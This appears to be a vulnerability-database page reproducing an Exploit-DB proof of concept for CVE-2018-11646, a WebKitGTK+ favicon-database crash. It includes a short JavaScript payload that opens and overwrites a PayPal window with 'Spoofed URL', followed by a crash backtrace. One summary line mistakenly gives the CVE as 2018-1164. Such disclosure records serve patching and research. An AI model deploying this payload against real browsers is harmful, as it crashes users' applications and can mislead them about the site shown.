Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WebKitGTK+ < 2.21.3 - Crash (PoC)

🗓️ 05 Jun 2018 00:00:00Reported by Dhiraj MishraType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 58 Views

WebKitGTK+ < 2.21.3 - Crash (PoC) by Dhiraj Mishra. webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL mishandle unset pageURL leading to application crash. CVE-2018-1164

Related
Code
ReporterTitlePublishedViews
Family
0day.today		WebKitGTK+ < 2.21.3 - pageURL Mishandling Crash (PoC) Exploit
6 Jun 201800:00
zdt
0day.today		WebKitGTK+ < 2.21.3 - #WebKitFaviconDatabase DoS Exploit
11 Jun 201800:00
zdt
Circl		CVE-2018-11646
21 Jun 201821:37
circl
CNVD		Apple Safari Technology Preview WebKit Denial of Service Vulnerability (CNVD-2018-11311)
5 Jun 201800:00
cnvd
CVE		CVE-2018-11646
1 Jun 201813:00
cve
Cvelist		CVE-2018-11646
1 Jun 201813:00
cvelist
Debian CVE		CVE-2018-11646
1 Jun 201813:00
debiancve
Exploit DB		WebKitGTK+ &lt; 2.21.3 - &#039;WebKitFaviconDatabase&#039; Denial of Service (Metasploit)
11 Jun 201800:00
exploitdb
exploitpack		WebKitGTK+ 2.21.3 - WebKitFaviconDatabase Denial of Service (Metasploit)
11 Jun 201800:00
exploitpack
exploitpack		WebKitGTK+ 2.21.3 - Crash (PoC)
5 Jun 201800:00
exploitpack
Rows per page
# Title: WebKitGTK+ < 2.21.3 - Crash (PoC) 
# Author: Dhiraj Mishra
# Date: 2018-06-05
# Software: https://webkitgtk.org/
# CVE: CVE-2018-11646
# Summary:
# webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in 
# UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, 
# mishandle an unset pageURL, leading to an application crash, CVE-2018-11646 was assigned to this issue.

# PoC:

<script>
win = window.open("sleep_one_second.php", "WIN"); 
window.open("https://www.paypal.com", "WIN");  
win.document.execCommand('Stop');              
win.document.write("Spoofed URL");   
win.document.close();
</script>


Backtrace using fedora 27:

#0 WTF::StringImpl::rawHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508
#1 WTF::StringImpl::hasHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514
#2 WTF::StringImpl::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525
#3 WTF::StringHash::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73
#9 WTF::HashMap, WTF::HashTraits >::get
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406
#10 webkitFaviconDatabaseSetIconURLForPageURL
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193
#11 webkitFaviconDatabaseSetIconForPageURL
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318
#12 webkitWebViewSetIcon
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964
#13 WTF::Function::performCallbackWithReturnValue
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108
#15 WebKit::WebPageProxy::dataCallback
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083
#16 WebKit::WebPageProxy::finishedLoadingIcon
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848
#17 IPC::callMemberFunctionImpl::operator()
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68
#29 WTF::RunLoop::::_FUN(gpointer)
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70
#30 g_main_dispatch
at gmain.c line 3148
#31 g_main_context_dispatch
at gmain.c line 3813
#32 g_main_context_iterate
at gmain.c line 3886
#33 g_main_context_iteration
at gmain.c line 3947x
#34 g_application_run
at gapplication.c line 2401
#35 main
at ../src/ephy-main.c line 432 


# Reference's:
# https://bugs.webkit.org/show_bug.cgi?id=186164
# https://bugzilla.gnome.org/show_bug.cgi?id=795740

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Jun 2018 00:00Current
8.2High risk
Vulners AI Score8.2
CVSS 25
CVSS 37.5
EPSS0.75346
cve-2018-11646webkitgtk+application crashdhiraj mishrawebkitfavicondatabaseseticonforpageurlwebkitfavicondatabaseseticonurlforpageurl
58